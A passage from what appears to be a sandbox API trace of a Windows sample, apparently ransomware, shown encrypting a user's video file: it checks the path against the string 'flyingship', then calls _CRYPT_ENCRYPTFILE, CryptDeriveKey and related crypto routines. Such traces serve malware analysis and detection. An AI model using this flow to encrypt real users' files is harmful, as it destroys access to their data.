cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HX538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="538Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="38Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ki1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CNShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NShky.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.820] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.820] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0196.820] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0196.820] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.821] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.821] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.821] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.821] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0196.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x7b3a1a70, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 0x90af58 [0196.821] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0196.821] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.821] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.821] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.821] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.821] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0196.821] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.821] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0196.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0196.822] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.822] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.822] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.822] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.822] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0196.822] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.822] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0196.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.824] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0196.824] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.824] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.824] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.824] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.825] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0196.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.825] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0196.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.825] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.825] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.825] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.826] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.826] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.826] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.826] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.826] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.827] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0196.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.827] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.827] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.827] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.827] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0196.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.827] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.828] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.828] PeekMessageW (in: 